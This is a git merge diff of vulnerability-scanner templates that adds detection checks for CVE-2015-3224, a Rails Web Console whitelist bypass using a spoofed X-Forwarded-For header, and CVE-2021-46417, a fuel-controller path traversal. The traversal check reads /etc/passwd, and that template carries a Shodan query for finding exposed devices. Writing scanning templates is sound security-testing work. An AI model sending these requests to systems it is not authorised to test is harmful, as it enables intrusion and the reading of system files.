Merge branch 'projectdiscovery:master' into master

.new-additions

@@ -1,8 +1,10 @@
 cves/2010/CVE-2010-4239.yaml
+cves/2015/CVE-2015-3224.yaml
 cves/2018/CVE-2018-5715.yaml
 cves/2019/CVE-2019-16996.yaml
 cves/2021/CVE-2021-44077.yaml
 cves/2021/CVE-2021-44515.yaml
+cves/2021/CVE-2021-46417.yaml
 cves/2022/CVE-2022-0140.yaml
 cves/2022/CVE-2022-0208.yaml
 cves/2022/CVE-2022-0595.yaml
@@ -11,6 +13,7 @@ cves/2022/CVE-2022-1054.yaml
 cves/2022/CVE-2022-1119.yaml
 cves/2022/CVE-2022-27849.yaml
 default-logins/openemr/openemr-default-login.yaml
+exposed-panels/ruckus-unleashed-panel.yaml
 exposed-panels/synapse-mobility-panel.yaml
 exposures/configs/azure-domain-tenant.yaml
 exposures/configs/webpack-config.yaml

cves/2015/CVE-2015-3224.yaml

@@ -0,0 +1,39 @@
+id: CVE-2015-3224
+
+info:
+  name: Ruby on Rails Web Console - Remote Code Execution
+  author: pdteam
+  severity: critical
+  reference:
+    - https://www.metahackers.pro/rails-web-console-v2-whitelist-bypass-code-exec/
+    - https://www.jomar.fr/posts/2022/basic_recon_to_rce_ii/
+    - https://hackerone.com/reports/44513
+    - https://nvd.nist.gov/vuln/detail/CVE-2015-3224
+  tags: cve,cve2015,rce,rails,ruby
+  description: "request.rb in Web Console before 2.1.3, as used with Ruby on Rails 3.x and 4.x, does not properly restrict the use of X-Forwarded-For headers in determining a client's IP address, which allows remote attackers to bypass the whitelisted_ips protection mechanism via a crafted request."
+
+requests:
+  - method: GET
+    path:
+      - "{{BaseURL}}/{{randstr}}"
+
+    headers:
+      X-Forwarded-For: ::1
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: body
+        words:
+          - "Rails.root:"
+          - "Action Controller: Exception caught"
+        condition: and
+
+      - type: word
+        part: response
+        words:
+          - "X-Web-Console-Session-Id"
+          - "data-remote-path="
+          - "data-session-id="
+        case-insensitive: true
+        condition: or

cves/2021/CVE-2021-46417.yaml

@@ -0,0 +1,28 @@
+id: CVE-2021-46417
+
+info:
+  name: Franklin Fueling Systems Colibri Controller Module - Local File Inclusion
+  author: For3stCo1d
+  severity: high
+  reference:
+    - https://packetstormsecurity.com/files/166671/Franklin-Fueling-Systems-Colibri-Controller-Module-1.8.19.8580-Local-File-Inclusion.html
+    - https://nvd.nist.gov/vuln/detail/CVE-2021-46417
+  classification:
+    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
+    cvss-score: 7.5
+    cve-id: CVE-2021-46417
+    cwe-id: CWE-22
+  metadata:
+    shodan-query: http.html:"Franklin Fueling Systems"
+  tags: cve,cve2021,franklinfueling,lfi
+
+requests:
+  - method: GET
+    path:
+      - "{{BaseURL}}/cgi-bin/tsaupload.cgi?file_name=../../../../../..//etc/passwd&password="
+
+    matchers:
+      - type: regex
+        part: body
+        regex:
+          - "root:.*:0:0:"

exposures/logs/rails-debug-mode.yaml

@@ -1,19 +1,20 @@
 id: rails-debug-mode
 
 info:
-  name: Rails Debug Mode Enabled
+  name: Rails Debug Mode
   author: pdteam
   severity: medium
-  tags: logs,rails,exposure
+  tags: debug,rails,exposure
 
 requests:
   - method: GET
     path:
-      - "{{BaseURL}}/1238a92f573a48e58d356c42ca2c9610"
+      - "{{BaseURL}}/{{randstr}}"
+
     matchers:
       - type: word
+        part: body
         words:
           - "Rails.root:"
           - "Action Controller: Exception caught"
-        condition: and
+        condition: and
-        part: body

misconfiguration/rack-mini-profiler.yaml

@@ -4,7 +4,7 @@ info:
   name: rack-mini-profiler environment information disclosure
   author: vzamanillo
   severity: high
-  tags: config,debug
+  tags: config,debug,rails
 
 requests:
   - method: GET
@@ -16,6 +16,7 @@ requests:
       - type: word
         words:
           - "Rack Environment"
+
       - type: status
         status:
           - 200